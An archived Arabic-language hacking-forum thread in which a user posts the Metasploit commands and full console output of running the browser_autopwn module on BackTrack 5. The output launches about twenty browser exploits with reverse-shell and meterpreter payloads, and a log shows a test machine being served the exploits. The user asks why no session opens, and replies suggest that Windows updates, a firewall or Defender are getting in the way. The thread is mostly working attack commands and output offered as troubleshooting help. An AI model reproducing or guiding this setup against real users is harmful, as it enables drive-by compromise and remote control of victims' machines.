المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : خبراء الباك تراك ساعدوني ارجوكم


shams2100
12-18-2012, 02:22 AM
يا جماعة انا زهقت من كتر البحث و لا اجد حل
انا بشتغل على نسخة
****sploit
backtrack 5
و عندما اقوم باستغلال الثغرة
auxiliary/server/browser_autopwn
و تكون الاعدادات كالاتي




msf > use auxiliary/server/browser_autopwn
msf auxiliary(browser_autopwn) > show options

Module options (auxiliary/server/browser_autopwn):

**** Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The IP address to use for reverse-connect payloads
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)

msf auxiliary(browser_autopwn) > set lhost 192.168.1.5
lhost => 192.168.1.5
msf auxiliary(browser_autopwn) > set srvport 80
srvport => 80
msf auxiliary(browser_autopwn) > exploit







و بعد عمل
exploit





Auxiliary module execution completed
msf auxiliary(browser_autopwn) >

Starting exploit modules on host 192.168.1.5...
---

Starting exploit multi/browser/firefox_escape_retval with payload generic/shell_reverse_tcp
Using URL: [فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
Local IP: [فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
Server started.
Starting exploit multi/browser/****_calendar_deserialize with payload ****/meterpreter/reverse_tcp
Using URL: [فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
Local IP: [فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
Server started.
Starting exploit multi/browser/****_trusted_chain with payload ****/meterpreter/reverse_tcp
Using URL: [فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
Local IP: [فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
Server started.
Starting exploit multi/browser/mozilla_compareto with payload generic/shell_reverse_tcp
Using URL: [فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
Local IP: [فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
Server started.
Starting exploit multi/browser/mozilla_navigator**** with payload generic/shell_reverse_tcp
Using URL: [فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
Local IP: [فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
Server started.
Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp
Using URL: [فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
Local IP: [فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
Server started.
Starting exploit multi/browser/opera_historysearch with payload generic/shell_reverse_tcp
Using URL: [فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
Local IP: [فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
Server started.
Starting exploit osx/browser/safari_****data_archive with payload generic/shell_reverse_tcp
Using URL: [فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
Local IP: [فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
Server started.
Starting exploit windows/browser/apple_quicktime_marshaled_punk with payload windows/meterpreter/reverse_tcp
Using URL: [فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
Local IP: [فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
Server started.
Starting exploit windows/browser/apple_quicktime_rtsp with payload windows/meterpreter/reverse_tcp
Using URL: [فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
Local IP: [فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
Server started.
Starting exploit windows/browser/apple_quicktime_smil_debug with payload windows/meterpreter/reverse_tcp
Using URL: [فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
Local IP: [فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
Server started.
Starting exploit windows/browser/enjoysapgui_comp_download with payload windows/meterpreter/reverse_tcp
Using URL: [فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
Local IP: [فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
Server started.
Starting exploit windows/browser/ie_createobject with payload windows/meterpreter/reverse_tcp
Using URL: [فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
Local IP: [فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
Server started.
Starting exploit windows/browser/mozilla_interleaved_write with payload windows/meterpreter/reverse_tcp
Using URL: [فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
Local IP: [فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
Server started.
Starting exploit windows/browser/ms03_020_ie_objecttype with payload windows/meterpreter/reverse_tcp
Using URL: [فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
Local IP: [فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
Server started.
Starting exploit windows/browser/ms10_090_ie_css_clip with payload windows/meterpreter/reverse_tcp
Using URL: [فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
Local IP: [فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
Server started.
Starting exploit windows/browser/ms11_003_ie_css_import with payload windows/meterpreter/reverse_tcp
Using URL: [فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
Local IP: [فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
Server started.
Starting exploit windows/browser/ms11_050_mshtml_cobjectelement with payload windows/meterpreter/reverse_tcp
Using URL: [فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
Local IP: [فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
Server started.
Starting exploit windows/browser/winzip_fileview with payload windows/meterpreter/reverse_tcp
Using URL: [فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
Local IP: [فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
Server started.
Starting exploit windows/browser/wmi_admintools with payload windows/meterpreter/reverse_tcp
Using URL: [فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
Local IP: [فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
Server started.
Starting handler for windows/meterpreter/reverse_tcp on port 3333
Starting handler for generic/shell_reverse_tcp on port 6666
Started reverse handler on 192.168.1.5:3333
Starting the payload handler...
Starting handler for ****/meterpreter/reverse_tcp on port 7777
Started reverse handler on 192.168.1.5:6666
Starting the payload handler...
Started reverse handler on 192.168.1.5:7777
Starting the payload handler...

--- Done, found 20 exploit modules

Using URL: [فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
Local IP: [فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
Server started.







قمت باستخدام و الضغط على اللنك من جهاز وهمي لدي

و لكن للاسف النتيجةدائما



[/CODE]



Request '/X967Gb' from 192.168.1.2:49553
Request '/X967Gb?sessid=V2luZG93czo3OnVuZGVmaW5lZDplbi1VUzp4 ODY6RmlyZWZveDozLjY6' from 192.168.1.2:49553
********** Report: Windows:7:undefined:en-US:x86:Firefox:3.6:
Reporting: {:os_****=>"Windows", :os_flavor=>"7", :os_lang=>"en-US", :arch=>"x86"}
Responding with exploits
Sending Mozilla Suite/Firefox Navigator Object Code Execution to 192.168.1.2:49553...
Handling request from 192.168.1.2:49553...
Payload will be a **** reverse shell to 192.168.1.5:7777 from 192.168.1.2...
Generated jar to drop (4932 bytes).
Handling request from 192.168.1.2:49555...
Sending Applet.jar to 192.168.1.2:49557...
Sun **** Calendar Deserialization Exploit sending Applet.jar to 192.168.1.2:49558...
Sending Applet.jar to 192.168.1.2:49557...
Sun **** Calendar Deserialization Exploit sending Applet.jar to 192.168.1.2:49558...

[/CODE]




و تقف النتيجة هنا

يا جماعة امنيتي اشوف الميتابريتر
****preter


ساعدوني ارجوكم

HaCKErS STORM
03-20-2013, 02:01 AM
صديقي ممكن انك تحاول على windows 7 و مفعل ال update بال win 7 او مفعل windows firewall or windows definder
وممكن ان الثغره ما بتجاوب على 7
واذا كانت هذي مشكلتك لا تحاول تجرب وشوفلك طريقه ثانيه :ok:
تحياتي

hackers.of.syr
06-02-2013, 10:44 PM
اخي انا ما فهمت مشكلتك بالضبط

يعني انو من المشروع ولا من النظام

اكتب اسم النظام

واصدار الميتا

لشوف المشكلة

تقبل مروري

lol